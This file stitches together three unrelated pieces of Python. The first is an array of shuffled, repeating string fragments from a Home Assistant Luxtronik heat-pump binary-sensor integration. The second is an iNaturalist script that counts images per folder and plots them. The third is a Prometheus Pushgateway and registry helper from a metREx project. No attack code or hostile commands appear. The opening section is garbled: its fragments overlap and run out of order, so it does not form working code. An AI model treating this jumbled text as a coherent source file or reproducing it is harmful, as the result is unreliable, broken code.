"self._sensor_key = sensor_key self.entity_id = ENTITY_ID_FORMAT.format(f\"{DOMAIN}_{unique_id}\") self._attr_unique_id = self.entity_id self._attr_device_info = deviceInfo self._attr_name",
"= name self._attr_icon = icon self._attr_device_class = device_class self._attr_state_class = state_class self._attr_entity_category =",
"sensor.name if not sensor_cfg.get( CONF_FRIENDLY_NAME) else sensor_cfg.get(CONF_FRIENDLY_NAME) entity_id = \"luxtronik.{}\".format(slugify(name)) # if use_legacy_sensor_ids",
"\"\"\"Get the latest status and use it to update our sensor state.\"\"\" self._luxtronik.update()",
"False deviceInfo = hass.data[f\"{DOMAIN}_DeviceInfo\"] deviceInfoHeating = hass.data[f\"{DOMAIN}_DeviceInfo_Heating\"] # Build Sensor names with local",
"= \"luxtronik.{}\".format(slugify(name)) # if use_legacy_sensor_ids else None LOGGER.info( \"binary_sensor.async_setup_platform create entity_id: '%s'\", entity_id)",
"LOGGER.warning( \"Invalid Luxtronik ID %s in group %s\", sensor_id, group, ) # endregion",
"luxtronik=luxtronik, deviceInfo=deviceInfoCooling, sensor_key='calculations.ID_WEB_FreigabKuehl', unique_id='approval_cooling', name=text_approval_cooling, icon='mdi:lock', device_class=DEVICE_CLASS_LOCK) ] async_add_entities(entities) # endregion Setup class",
"= device_class self._attr_state_class = state_class self._attr_entity_category = entity_category self._invert = invert_state @property def",
"LuxtronikDevice = hass.data.get(DOMAIN) if not luxtronik: LOGGER.warning(\"binary_sensor.async_setup_platform no luxtronik!\") return False # use_legacy_sensor_ids",
"ConfigEntry from homeassistant.const import (CONF_FRIENDLY_NAME, CONF_ICON, CONF_ID, CONF_SENSORS) from homeassistant.core import HomeAssistant from",
"'approval_cooling') entities += [ LuxtronikBinarySensor(hass=hass, luxtronik=luxtronik, deviceInfo=deviceInfoCooling, sensor_key='calculations.ID_WEB_FreigabKuehl', unique_id='approval_cooling', name=text_approval_cooling, icon='mdi:lock', device_class=DEVICE_CLASS_LOCK) ]",
"vol.Required(CONF_SENSORS): vol.All( cv.ensure_list, [ { vol.Required(CONF_GROUP): vol.All( cv.string, vol.In( [CONF_PARAMETERS, CONF_CALCULATIONS, CONF_VISIBILITIES]), ),",
"str, device_class: str, state_class: str = None, entity_category: ENTITY_CATEGORIES = None, invert_state: bool",
"icon=sensor_cfg.get(CONF_ICON), device_class=DEVICE_CLASSES.get( sensor.measurement_type, DEFAULT_DEVICE_CLASS), state_class=None, invert_state=sensor_cfg.get(CONF_INVERT_STATE)) ] else: LOGGER.warning( \"Invalid Luxtronik ID %s",
"endregion Imports # region Constants PLATFORM_SCHEMA = PLATFORM_SCHEMA.extend( { vol.Required(CONF_SENSORS): vol.All( cv.ensure_list, [",
"from typing import Any, Final import homeassistant.helpers.config_validation as cv import voluptuous as vol",
"deviceInfoHeating = hass.data[f\"{DOMAIN}_DeviceInfo_Heating\"] # Build Sensor names with local language: lang = config_entry.options.get(CONF_LANGUAGE_SENSOR_NAMES)",
"# region Setup async def async_setup_platform( hass: HomeAssistant, config: ConfigType, async_add_entities: AddEntitiesCallback, discovery_info:",
"ConfigType: %s - discovery_info: %s\", config, discovery_info) luxtronik: LuxtronikDevice = hass.data.get(DOMAIN) if not",
"CONF_ICON, CONF_ID, CONF_SENSORS) from homeassistant.core import HomeAssistant from homeassistant.helpers.entity import ENTITY_CATEGORIES, DeviceInfo from",
"homeassistant.components.sensor import ENTITY_ID_FORMAT from homeassistant.config_entries import ConfigEntry from homeassistant.const import (CONF_FRIENDLY_NAME, CONF_ICON, CONF_ID,",
"def __init__( self, hass: HomeAssistant, luxtronik: LuxtronikDevice, deviceInfo: DeviceInfo, sensor_key: str, unique_id: str,",
"], ) } ) # endregion Constants # region Setup async def async_setup_platform(",
"sensor_key=f\"{group}.{sensor_id}\", unique_id=sensor_id, name=name, icon=sensor_cfg.get(CONF_ICON), device_class=DEVICE_CLASSES.get( sensor.measurement_type, DEFAULT_DEVICE_CLASS), state_class=None, invert_state=sensor_cfg.get(CONF_INVERT_STATE)) ] else: LOGGER.warning( \"Invalid",
"if not luxtronik: LOGGER.warning(\"binary_sensor.async_setup_entry no luxtronik!\") return False deviceInfo = hass.data[f\"{DOMAIN}_DeviceInfo\"] deviceInfoHeating =",
"%s\", config_entry) luxtronik: LuxtronikDevice = hass.data.get(DOMAIN) if not luxtronik: LOGGER.warning(\"binary_sensor.async_setup_entry no luxtronik!\") return",
"value if self._invert else value def update(self): \"\"\"Get the latest status and use",
"use_legacy_sensor_ids = hass.data[f\"{DOMAIN}_{CONF_USE_LEGACY_SENSOR_IDS}\"] deviceInfo = hass.data[f\"{DOMAIN}_DeviceInfo\"] deviceInfoDomesticWater = hass.data[f\"{DOMAIN}_DeviceInfo_Domestic_Water\"] deviceInfoHeating = hass.data[f\"{DOMAIN}_DeviceInfo_Heating\"] deviceInfoCooling",
"self._invert else value def update(self): \"\"\"Get the latest status and use it to",
"class LuxtronikBinarySensor(BinarySensorEntity, RestoreEntity): \"\"\"Representation of a Luxtronik binary sensor.\"\"\" def __init__( self, hass:",
"Luxtronik heatpump binary states.\"\"\" # region Imports import logging from typing import Any,",
"sensor from yaml config.\"\"\" LOGGER.info(f\"{DOMAIN}.binary_sensor.async_setup_platform ConfigType: %s - discovery_info: %s\", config, discovery_info) luxtronik:",
"async def async_setup_entry( hass: HomeAssistant, config_entry: ConfigEntry, async_add_entities: AddEntitiesCallback ) -> None: \"\"\"Set",
"%s\", config, discovery_info) luxtronik: LuxtronikDevice = hass.data.get(DOMAIN) if not luxtronik: LOGGER.warning(\"binary_sensor.async_setup_platform no luxtronik!\")",
"+= [ LuxtronikBinarySensor(hass=hass, luxtronik=luxtronik, deviceInfo=deviceInfoCooling, sensor_key='calculations.ID_WEB_FreigabKuehl', unique_id='approval_cooling', name=text_approval_cooling, icon='mdi:lock', device_class=DEVICE_CLASS_LOCK) ] async_add_entities(entities) #",
"= luxtronik.get_sensor(group, sensor_id) if sensor: name = sensor.name if not sensor_cfg.get( CONF_FRIENDLY_NAME) else",
"sensor_id, group, ) # endregion Legacy part: async_add_entities(entities) async def async_setup_entry( hass: HomeAssistant,",
"hass.data.get(DOMAIN) if not luxtronik: LOGGER.warning(\"binary_sensor.async_setup_platform no luxtronik!\") return False # use_legacy_sensor_ids = hass.data[f\"{DOMAIN}_{CONF_USE_LEGACY_SENSOR_IDS}\"]",
"None, entity_category: ENTITY_CATEGORIES = None, invert_state: bool = False ) -> None: \"\"\"Initialize",
"import logging from typing import Any, Final import homeassistant.helpers.config_validation as cv import voluptuous",
"if self._invert else value def update(self): \"\"\"Get the latest status and use it",
"if not sensor_cfg.get( CONF_FRIENDLY_NAME) else sensor_cfg.get(CONF_FRIENDLY_NAME) entity_id = \"luxtronik.{}\".format(slugify(name)) # if use_legacy_sensor_ids else",
"if '.' in sensor_id: group = sensor_id.split('.')[0] sensor_id = sensor_id.split('.')[1] else: group =",
"[ { vol.Required(CONF_GROUP): vol.All( cv.string, vol.In( [CONF_PARAMETERS, CONF_CALCULATIONS, CONF_VISIBILITIES]), ), vol.Required(CONF_ID): cv.string, vol.Optional(CONF_FRIENDLY_NAME):",
"vol.All( cv.ensure_list, [ { vol.Required(CONF_GROUP): vol.All( cv.string, vol.In( [CONF_PARAMETERS, CONF_CALCULATIONS, CONF_VISIBILITIES]), ), vol.Required(CONF_ID):",
"local language: lang = config_entry.options.get(CONF_LANGUAGE_SENSOR_NAMES) text_evu_unlocked = get_sensor_text(lang, 'evu_unlocked') entities = [ LuxtronikBinarySensor(hass=hass,",
"of a Luxtronik binary sensor.\"\"\" def __init__( self, hass: HomeAssistant, luxtronik: LuxtronikDevice, deviceInfo:",
"invert_state=sensor_cfg.get(CONF_INVERT_STATE)) ] else: LOGGER.warning( \"Invalid Luxtronik ID %s in group %s\", sensor_id, group,",
"device_class=DEVICE_CLASS_LOCK) ] async_add_entities(entities) # endregion Setup class LuxtronikBinarySensor(BinarySensorEntity, RestoreEntity): \"\"\"Representation of a Luxtronik",
"vol.Optional(CONF_ICON): cv.string, vol.Optional(CONF_INVERT_STATE, default=False): cv.boolean, } ], ) } ) # endregion Constants",
"import (DEVICE_CLASS_LOCK, DEVICE_CLASS_RUNNING, PLATFORM_SCHEMA, BinarySensorEntity) from homeassistant.components.sensor import ENTITY_ID_FORMAT from homeassistant.config_entries import ConfigEntry",
"true if binary sensor is on.\"\"\" value = self._luxtronik.get_value(self._sensor_key) return not value if",
".helpers.helper import get_sensor_text from .luxtronik_device import LuxtronikDevice # endregion Imports # region Constants",
"icon='mdi:lock', device_class=DEVICE_CLASS_LOCK) ] deviceInfoDomesticWater = hass.data[f\"{DOMAIN}_DeviceInfo_Domestic_Water\"] if deviceInfoDomesticWater is not None: text_solar_pump =",
"config.\"\"\" LOGGER.info(f\"{DOMAIN}.binary_sensor.async_setup_platform ConfigType: %s - discovery_info: %s\", config, discovery_info) luxtronik: LuxtronikDevice = hass.data.get(DOMAIN)",
"self.hass = hass self._luxtronik = luxtronik self._sensor_key = sensor_key self.entity_id = ENTITY_ID_FORMAT.format(f\"{DOMAIN}_{unique_id}\") self._attr_unique_id",
"luxtronik: LuxtronikDevice = hass.data.get(DOMAIN) if not luxtronik: LOGGER.warning(\"binary_sensor.async_setup_entry no luxtronik!\") return False deviceInfo",
"entities += [ LuxtronikBinarySensor(hass=hass, luxtronik=luxtronik, deviceInfo=deviceInfoCooling, sensor_key='calculations.ID_WEB_FreigabKuehl', unique_id='approval_cooling', name=text_approval_cooling, icon='mdi:lock', device_class=DEVICE_CLASS_LOCK) ] async_add_entities(entities)",
"homeassistant.helpers.config_validation as cv import voluptuous as vol from homeassistant.components.binary_sensor import (DEVICE_CLASS_LOCK, DEVICE_CLASS_RUNNING, PLATFORM_SCHEMA,",
"Legacy part: for sensor_cfg in sensors: sensor_id = sensor_cfg[CONF_ID] if '.' in sensor_id:",
"config_entry.options.get(CONF_LANGUAGE_SENSOR_NAMES) text_evu_unlocked = get_sensor_text(lang, 'evu_unlocked') entities = [ LuxtronikBinarySensor(hass=hass, luxtronik=luxtronik, deviceInfo=deviceInfo, sensor_key=LUX_BINARY_SENSOR_EVU_UNLOCKED, unique_id='evu_unlocked',",
"luxtronik self._sensor_key = sensor_key self.entity_id = ENTITY_ID_FORMAT.format(f\"{DOMAIN}_{unique_id}\") self._attr_unique_id = self.entity_id self._attr_device_info = deviceInfo",
"LuxtronikBinarySensor(BinarySensorEntity, RestoreEntity): \"\"\"Representation of a Luxtronik binary sensor.\"\"\" def __init__( self, hass: HomeAssistant,",
"icon='mdi:pump', device_class=DEVICE_CLASS_RUNNING) ] deviceInfoCooling = hass.data[f\"{DOMAIN}_DeviceInfo_Cooling\"] if deviceInfoCooling is not None: text_approval_cooling =",
"ConfigEntry.\"\"\" LOGGER.info( f\"{DOMAIN}.binary_sensor.async_setup_entry ConfigType: %s\", config_entry) luxtronik: LuxtronikDevice = hass.data.get(DOMAIN) if not luxtronik:",
"LuxtronikBinarySensor(hass=hass, luxtronik=luxtronik, deviceInfo=deviceInfoDomesticWater, sensor_key=LUX_BINARY_SENSOR_SOLAR_PUMP, unique_id='solar_pump', name=text_solar_pump, icon='mdi:pump', device_class=DEVICE_CLASS_RUNNING) ] deviceInfoCooling = hass.data[f\"{DOMAIN}_DeviceInfo_Cooling\"] if",
"Luxtronik binary sensor.\"\"\" def __init__( self, hass: HomeAssistant, luxtronik: LuxtronikDevice, deviceInfo: DeviceInfo, sensor_key:",
"region Setup async def async_setup_platform( hass: HomeAssistant, config: ConfigType, async_add_entities: AddEntitiesCallback, discovery_info: dict[str,",
"device_class: str, state_class: str = None, entity_category: ENTITY_CATEGORIES = None, invert_state: bool =",
"self._attr_entity_category = entity_category self._invert = invert_state @property def is_on(self): \"\"\"Return true if binary",
"str, name: str, icon: str, device_class: str, state_class: str = None, entity_category: ENTITY_CATEGORIES",
"LuxtronikBinarySensor(hass=hass, luxtronik=luxtronik, deviceInfo=deviceInfoCooling, sensor_key='calculations.ID_WEB_FreigabKuehl', unique_id='approval_cooling', name=text_approval_cooling, icon='mdi:lock', device_class=DEVICE_CLASS_LOCK) ] async_add_entities(entities) # endregion Setup",
"sensor is on.\"\"\" value = self._luxtronik.get_value(self._sensor_key) return not value if self._invert else value",
"sensors: sensor_id = sensor_cfg[CONF_ID] if '.' in sensor_id: group = sensor_id.split('.')[0] sensor_id =",
"None: text_solar_pump = get_sensor_text(lang, 'solar_pump') entities += [ LuxtronikBinarySensor(hass=hass, luxtronik=luxtronik, deviceInfo=deviceInfoDomesticWater, sensor_key=LUX_BINARY_SENSOR_SOLAR_PUMP, unique_id='solar_pump',",
"else sensor_cfg.get(CONF_FRIENDLY_NAME) entity_id = \"luxtronik.{}\".format(slugify(name)) # if use_legacy_sensor_ids else None LOGGER.info( \"binary_sensor.async_setup_platform create",
"from homeassistant.components.sensor import ENTITY_ID_FORMAT from homeassistant.config_entries import ConfigEntry from homeassistant.const import (CONF_FRIENDLY_NAME, CONF_ICON,",
"LOGGER.info(f\"{DOMAIN}.binary_sensor.async_setup_platform ConfigType: %s - discovery_info: %s\", config, discovery_info) luxtronik: LuxtronikDevice = hass.data.get(DOMAIN) if",
"text_solar_pump = get_sensor_text(lang, 'solar_pump') entities += [ LuxtronikBinarySensor(hass=hass, luxtronik=luxtronik, deviceInfo=deviceInfoDomesticWater, sensor_key=LUX_BINARY_SENSOR_SOLAR_PUMP, unique_id='solar_pump', name=text_solar_pump,",
"def async_setup_platform( hass: HomeAssistant, config: ConfigType, async_add_entities: AddEntitiesCallback, discovery_info: dict[str, Any] = None,",
"name=text_approval_cooling, icon='mdi:lock', device_class=DEVICE_CLASS_LOCK) ] async_add_entities(entities) # endregion Setup class LuxtronikBinarySensor(BinarySensorEntity, RestoreEntity): \"\"\"Representation of",
"\"\"\"Return true if binary sensor is on.\"\"\" value = self._luxtronik.get_value(self._sensor_key) return not value",
"a Luxtronik sensor from ConfigEntry.\"\"\" LOGGER.info( f\"{DOMAIN}.binary_sensor.async_setup_entry ConfigType: %s\", config_entry) luxtronik: LuxtronikDevice =",
"AddEntitiesCallback from homeassistant.helpers.typing import ConfigType from homeassistant.helpers.restore_state import RestoreEntity from homeassistant.util import slugify",
"%s\", sensor_id, group, ) # endregion Legacy part: async_add_entities(entities) async def async_setup_entry( hass:",
"up a Luxtronik sensor from ConfigEntry.\"\"\" LOGGER.info( f\"{DOMAIN}.binary_sensor.async_setup_entry ConfigType: %s\", config_entry) luxtronik: LuxtronikDevice",
"luxtronik: LuxtronikDevice, deviceInfo: DeviceInfo, sensor_key: str, unique_id: str, name: str, icon: str, device_class:",
"AddEntitiesCallback, discovery_info: dict[str, Any] = None, ) -> None: \"\"\"Set up a Luxtronik",
"False ) -> None: \"\"\"Initialize a new Luxtronik binary sensor.\"\"\" self.hass = hass",
"self.entity_id = ENTITY_ID_FORMAT.format(f\"{DOMAIN}_{unique_id}\") self._attr_unique_id = self.entity_id self._attr_device_info = deviceInfo self._attr_name = name self._attr_icon",
"with local language: lang = config_entry.options.get(CONF_LANGUAGE_SENSOR_NAMES) text_evu_unlocked = get_sensor_text(lang, 'evu_unlocked') entities = [",
"= icon self._attr_device_class = device_class self._attr_state_class = state_class self._attr_entity_category = entity_category self._invert =",
"= sensor_cfg[CONF_ID] if '.' in sensor_id: group = sensor_id.split('.')[0] sensor_id = sensor_id.split('.')[1] else:",
"unique_id='evu_unlocked', name=text_evu_unlocked, icon='mdi:lock', device_class=DEVICE_CLASS_LOCK) ] deviceInfoDomesticWater = hass.data[f\"{DOMAIN}_DeviceInfo_Domestic_Water\"] if deviceInfoDomesticWater is not None:",
"deviceInfoHeating = hass.data[f\"{DOMAIN}_DeviceInfo_Heating\"] deviceInfoCooling = hass.data[f\"{DOMAIN}_DeviceInfo_Cooling\"] sensors = config.get(CONF_SENSORS) entities = [] if",
"[CONF_PARAMETERS, CONF_CALCULATIONS, CONF_VISIBILITIES]), ), vol.Required(CONF_ID): cv.string, vol.Optional(CONF_FRIENDLY_NAME): cv.string, vol.Optional(CONF_ICON): cv.string, vol.Optional(CONF_INVERT_STATE, default=False): cv.boolean,",
"luxtronik=luxtronik, deviceInfo=deviceInfo, sensor_key=LUX_BINARY_SENSOR_EVU_UNLOCKED, unique_id='evu_unlocked', name=text_evu_unlocked, icon='mdi:lock', device_class=DEVICE_CLASS_LOCK) ] deviceInfoDomesticWater = hass.data[f\"{DOMAIN}_DeviceInfo_Domestic_Water\"] if deviceInfoDomesticWater",
"hass: HomeAssistant, config: ConfigType, async_add_entities: AddEntitiesCallback, discovery_info: dict[str, Any] = None, ) ->",
"endregion Constants # region Setup async def async_setup_platform( hass: HomeAssistant, config: ConfigType, async_add_entities:",
"group = sensor_cfg[CONF_GROUP] sensor = luxtronik.get_sensor(group, sensor_id) if sensor: name = sensor.name if",
"LuxtronikBinarySensor(hass=hass, luxtronik=luxtronik, deviceInfo=deviceInfo, sensor_key=LUX_BINARY_SENSOR_EVU_UNLOCKED, unique_id='evu_unlocked', name=text_evu_unlocked, icon='mdi:lock', device_class=DEVICE_CLASS_LOCK) ] deviceInfoDomesticWater = hass.data[f\"{DOMAIN}_DeviceInfo_Domestic_Water\"] if",
"= config_entry.options.get(CONF_LANGUAGE_SENSOR_NAMES) text_evu_unlocked = get_sensor_text(lang, 'evu_unlocked') entities = [ LuxtronikBinarySensor(hass=hass, luxtronik=luxtronik, deviceInfo=deviceInfo, sensor_key=LUX_BINARY_SENSOR_EVU_UNLOCKED,",
"region Imports import logging from typing import Any, Final import homeassistant.helpers.config_validation as cv",
"sensor from ConfigEntry.\"\"\" LOGGER.info( f\"{DOMAIN}.binary_sensor.async_setup_entry ConfigType: %s\", config_entry) luxtronik: LuxtronikDevice = hass.data.get(DOMAIN) if",
"get_sensor_text(lang, 'approval_cooling') entities += [ LuxtronikBinarySensor(hass=hass, luxtronik=luxtronik, deviceInfo=deviceInfoCooling, sensor_key='calculations.ID_WEB_FreigabKuehl', unique_id='approval_cooling', name=text_approval_cooling, icon='mdi:lock', device_class=DEVICE_CLASS_LOCK)",
"= PLATFORM_SCHEMA.extend( { vol.Required(CONF_SENSORS): vol.All( cv.ensure_list, [ { vol.Required(CONF_GROUP): vol.All( cv.string, vol.In( [CONF_PARAMETERS,",
"on.\"\"\" value = self._luxtronik.get_value(self._sensor_key) return not value if self._invert else value def update(self):",
"from homeassistant.config_entries import ConfigEntry from homeassistant.const import (CONF_FRIENDLY_NAME, CONF_ICON, CONF_ID, CONF_SENSORS) from homeassistant.core",
"async_setup_platform( hass: HomeAssistant, config: ConfigType, async_add_entities: AddEntitiesCallback, discovery_info: dict[str, Any] = None, )",
"name=name, icon=sensor_cfg.get(CONF_ICON), device_class=DEVICE_CLASSES.get( sensor.measurement_type, DEFAULT_DEVICE_CLASS), state_class=None, invert_state=sensor_cfg.get(CONF_INVERT_STATE)) ] else: LOGGER.warning( \"Invalid Luxtronik ID",
"sensor_id.split('.')[1] else: group = sensor_cfg[CONF_GROUP] sensor = luxtronik.get_sensor(group, sensor_id) if sensor: name =",
"hass self._luxtronik = luxtronik self._sensor_key = sensor_key self.entity_id = ENTITY_ID_FORMAT.format(f\"{DOMAIN}_{unique_id}\") self._attr_unique_id = self.entity_id",
"Setup async def async_setup_platform( hass: HomeAssistant, config: ConfigType, async_add_entities: AddEntitiesCallback, discovery_info: dict[str, Any]",
"device_class=DEVICE_CLASS_LOCK) ] deviceInfoDomesticWater = hass.data[f\"{DOMAIN}_DeviceInfo_Domestic_Water\"] if deviceInfoDomesticWater is not None: text_solar_pump = get_sensor_text(lang,",
"- discovery_info: %s\", config, discovery_info) luxtronik: LuxtronikDevice = hass.data.get(DOMAIN) if not luxtronik: LOGGER.warning(\"binary_sensor.async_setup_platform",
"no luxtronik!\") return False deviceInfo = hass.data[f\"{DOMAIN}_DeviceInfo\"] deviceInfoHeating = hass.data[f\"{DOMAIN}_DeviceInfo_Heating\"] # Build Sensor",
"get_sensor_text(lang, 'evu_unlocked') entities = [ LuxtronikBinarySensor(hass=hass, luxtronik=luxtronik, deviceInfo=deviceInfo, sensor_key=LUX_BINARY_SENSOR_EVU_UNLOCKED, unique_id='evu_unlocked', name=text_evu_unlocked, icon='mdi:lock', device_class=DEVICE_CLASS_LOCK)",
"entity_id = \"luxtronik.{}\".format(slugify(name)) # if use_legacy_sensor_ids else None LOGGER.info( \"binary_sensor.async_setup_platform create entity_id: '%s'\",",
"PLATFORM_SCHEMA.extend( { vol.Required(CONF_SENSORS): vol.All( cv.ensure_list, [ { vol.Required(CONF_GROUP): vol.All( cv.string, vol.In( [CONF_PARAMETERS, CONF_CALCULATIONS,",
"str, icon: str, device_class: str, state_class: str = None, entity_category: ENTITY_CATEGORIES = None,",
"None, invert_state: bool = False ) -> None: \"\"\"Initialize a new Luxtronik binary",
"from yaml config.\"\"\" LOGGER.info(f\"{DOMAIN}.binary_sensor.async_setup_platform ConfigType: %s - discovery_info: %s\", config, discovery_info) luxtronik: LuxtronikDevice",
"None: \"\"\"Set up a Luxtronik binary sensor from yaml config.\"\"\" LOGGER.info(f\"{DOMAIN}.binary_sensor.async_setup_platform ConfigType: %s",
"def async_setup_entry( hass: HomeAssistant, config_entry: ConfigEntry, async_add_entities: AddEntitiesCallback ) -> None: \"\"\"Set up",
"HomeAssistant, luxtronik: LuxtronikDevice, deviceInfo: DeviceInfo, sensor_key: str, unique_id: str, name: str, icon: str,",
") # endregion Legacy part: async_add_entities(entities) async def async_setup_entry( hass: HomeAssistant, config_entry: ConfigEntry,",
"# use_legacy_sensor_ids = hass.data[f\"{DOMAIN}_{CONF_USE_LEGACY_SENSOR_IDS}\"] deviceInfo = hass.data[f\"{DOMAIN}_DeviceInfo\"] deviceInfoDomesticWater = hass.data[f\"{DOMAIN}_DeviceInfo_Domestic_Water\"] deviceInfoHeating = hass.data[f\"{DOMAIN}_DeviceInfo_Heating\"]",
"= hass.data.get(DOMAIN) if not luxtronik: LOGGER.warning(\"binary_sensor.async_setup_entry no luxtronik!\") return False deviceInfo = hass.data[f\"{DOMAIN}_DeviceInfo\"]",
"endregion Legacy part: async_add_entities(entities) async def async_setup_entry( hass: HomeAssistant, config_entry: ConfigEntry, async_add_entities: AddEntitiesCallback",
"name: str, icon: str, device_class: str, state_class: str = None, entity_category: ENTITY_CATEGORIES =",
"# endregion Imports # region Constants PLATFORM_SCHEMA = PLATFORM_SCHEMA.extend( { vol.Required(CONF_SENSORS): vol.All( cv.ensure_list,",
"sensor_cfg[CONF_GROUP] sensor = luxtronik.get_sensor(group, sensor_id) if sensor: name = sensor.name if not sensor_cfg.get("
] |
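
A minimal standalone sketch of the inversion logic behind LuxtronikBinarySensor.is_on, with a hypothetical stub standing in for LuxtronikDevice; the stub class, helper function, and sample values below are assumptions for illustration, not part of the integration:

# Stub standing in for LuxtronikDevice; only get_value() is mimicked here.
class StubLuxtronikDevice:
    def __init__(self, values):
        self._values = values

    def get_value(self, sensor_key):
        return self._values[sensor_key]


def resolve_state(device, sensor_key, invert_state=False):
    # Mirrors is_on: return the raw value, optionally inverted.
    value = device.get_value(sensor_key)
    return not value if invert_state else value


device = StubLuxtronikDevice({'calculations.ID_WEB_FreigabKuehl': True})
assert resolve_state(device, 'calculations.ID_WEB_FreigabKuehl') is True
assert resolve_state(device, 'calculations.ID_WEB_FreigabKuehl', invert_state=True) is False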
# iNaturalist_stats.py
# explore data statistics
import numpy as np
import os
import seaborn as sns
import matplotlib.pyplot as plt

f = 'D:/noam_/Cornell/CS7999/iNaturalist/train_val_images/'
grp_names = []
grp_count = []
grp_min = np.inf
min_folder = ''
grp_max = 0
max_folder = ''
avg_folder = 0
counter = 0
for i, bio_grp in enumerate(os.listdir(f)):
    class_path = f + bio_grp + '/'
    grp_count.append(0)
    for clss in os.listdir(class_path):
        pics = len(os.listdir(class_path + clss + '/'))
        if pics > grp_max:
            grp_max = pics
            max_folder = clss
        if pics < grp_min:
            grp_min = pics
            min_folder = clss
        avg_folder += pics
        grp_count[i] += pics
        counter += 1
    grp_names.append(bio_grp)
avg_folder /= counter
print('smallest folder (%s) has %d images' % (min_folder, grp_min))
print('biggest folder (%s) has %d images' % (max_folder, grp_max))
print('average folder size is %d' % (round(avg_folder)))
'''
Results printed:
smallest folder (Datana ministra) has 14 images
biggest folder (Danaus plexippus) has 3949 images
average folder size is 133
'''

# Plot number of images per class
ax = sns.barplot(grp_names, grp_count)
ax.set_title('Distribution of Images by Biological Group')
ax.set_xlabel('Biological Group')
ax.set_ylabel('Number of images')
for p in ax.patches:
    ax.annotate("%d" % p.get_height(),
                (p.get_x() + p.get_width() / 2., p.get_height()),
                ha='center', va='center', fontsize=8, color='black',
                xytext=(0, 4), textcoords='offset points')
plt.show()
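
The same statistics can also be computed with a compact pathlib-based sketch; the relative dataset root below is a placeholder assumption, and the layout is taken to be root/<biological group>/<species class>/<images> as in the script above:

from pathlib import Path

root = Path('train_val_images')  # placeholder path; adjust to the dataset location

# Count images per species class across all biological groups.
sizes = {cls.name: sum(1 for _ in cls.iterdir())
         for grp in root.iterdir() if grp.is_dir()
         for cls in grp.iterdir() if cls.is_dir()}

if sizes:
    smallest = min(sizes, key=sizes.get)
    biggest = max(sizes, key=sizes.get)
    print('smallest folder (%s) has %d images' % (smallest, sizes[smallest]))
    print('biggest folder (%s) has %d images' % (biggest, sizes[biggest]))
    print('average folder size is %d' % round(sum(sizes.values()) / len(sizes)))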
# metREx/app/main/util/prometheus_helper.py
import os
import re

from prometheus_client.core import CollectorRegistry
from prometheus_client.multiprocess import MultiProcessCollector

collector_registries = {}

prometheus_multiproc_dir = os.getenv('prometheus_multiproc_dir')


def get_pushgateways(aa, apialchemy_info):
    pushgateways = {}

    apialchemy_prefix, apialchemy_binds = apialchemy_info

    service_name_pattern = re.compile(r'^' + r'(?:' + re.escape(apialchemy_prefix) + r')(?P<name>.+)$', re.X)

    api_vendor_pattern = re.compile(r'^(?:(?P<vendor>\w+)(?:\+(?:http|https))?)(?=://)', re.X)

    pushgateway_services = list(filter(None, re.split(r'\s*,\s*', os.getenv('PUSHGATEWAY_SERVICES', ''))))

    for service in pushgateway_services:
        m = service_name_pattern.match(service)

        if m is not None:
            components = m.groupdict()

            service_name = components['name']

            if service_name in apialchemy_binds.keys():
                conn_str = apialchemy_binds[service_name]

                m = api_vendor_pattern.match(conn_str)

                if m is not None:
                    components = m.groupdict()

                    if components['vendor'] == 'pushgateway':
                        from ..api.pushgateway import Pushgateway

                        dal = Pushgateway(aa)
                        dal.init_aa(service_name)

                        pushgateways[service] = dal.client
                    else:
                        raise ValueError("Service '" + service + "' is not a valid Pushgateway.")
            else:
                raise ValueError("Service '" + service + "' not found.")

    return pushgateways


def get_registry(name):
    if name not in collector_registries.keys():
        collector_registries[name] = CollectorRegistry()

        if prometheus_multiproc_dir is not None:
            MultiProcessCollector(collector_registries[name])

    return collector_registries[name]


def register_collector(name, collector):
    job_registry = get_registry(name)

    job_registry.register(collector)


def unregister_collector(name, collector):
    if name in collector_registries.keys():
        collector_registries[name].unregister(collector)

        del collector_registries[name]
"import os import re from prometheus_client.core import CollectorRegistry from prometheus_client.multiprocess import MultiProcessCollector collector_registries",
"re.escape(apialchemy_prefix) + r')(?P<name>.+)$', re.X) api_vendor_pattern = re.compile(r'^(?:(?P<vendor>\\w+)(?:\\+(?:http|https))?)(?=://)', re.X) pushgateway_services = list(filter(None, re.split(r'\\s*,\\s*', os.getenv('PUSHGATEWAY_SERVICES',",
"in collector_registries.keys(): collector_registries[name] = CollectorRegistry() if prometheus_multiproc_dir is not None: MultiProcessCollector(collector_registries[name]) return collector_registries[name]",
"'\" + service + \"' not found.\") return pushgateways def get_registry(name): if name",
"CollectorRegistry from prometheus_client.multiprocess import MultiProcessCollector collector_registries = {} prometheus_multiproc_dir = os.getenv('prometheus_multiproc_dir') def get_pushgateways(aa,",
"= list(filter(None, re.split(r'\\s*,\\s*', os.getenv('PUSHGATEWAY_SERVICES', '')))) for service in pushgateway_services: m = service_name_pattern.match(service) if",
"os import re from prometheus_client.core import CollectorRegistry from prometheus_client.multiprocess import MultiProcessCollector collector_registries =",
"valid Pushgateway.\") else: raise ValueError(\"Service '\" + service + \"' not found.\") return",
"+ \"' not found.\") return pushgateways def get_registry(name): if name not in collector_registries.keys():",
"apialchemy_binds[service_name] m = api_vendor_pattern.match(conn_str) if m is not None: components = m.groupdict() if",
"re.X) pushgateway_services = list(filter(None, re.split(r'\\s*,\\s*', os.getenv('PUSHGATEWAY_SERVICES', '')))) for service in pushgateway_services: m =",
"service_name_pattern = re.compile(r'^' + r'(?:' + re.escape(apialchemy_prefix) + r')(?P<name>.+)$', re.X) api_vendor_pattern = re.compile(r'^(?:(?P<vendor>\\w+)(?:\\+(?:http|https))?)(?=://)',",
"re.X) api_vendor_pattern = re.compile(r'^(?:(?P<vendor>\\w+)(?:\\+(?:http|https))?)(?=://)', re.X) pushgateway_services = list(filter(None, re.split(r'\\s*,\\s*', os.getenv('PUSHGATEWAY_SERVICES', '')))) for service",
"m is not None: components = m.groupdict() service_name = components['name'] if service_name in",
"api_vendor_pattern = re.compile(r'^(?:(?P<vendor>\\w+)(?:\\+(?:http|https))?)(?=://)', re.X) pushgateway_services = list(filter(None, re.split(r'\\s*,\\s*', os.getenv('PUSHGATEWAY_SERVICES', '')))) for service in",
"..api.pushgateway import Pushgateway dal = Pushgateway(aa) dal.init_aa(service_name) pushgateways[service] = dal.client else: raise ValueError(\"Service",
"= dal.client else: raise ValueError(\"Service '\" + service + \"' is not a",
"get_registry(name): if name not in collector_registries.keys(): collector_registries[name] = CollectorRegistry() if prometheus_multiproc_dir is not",
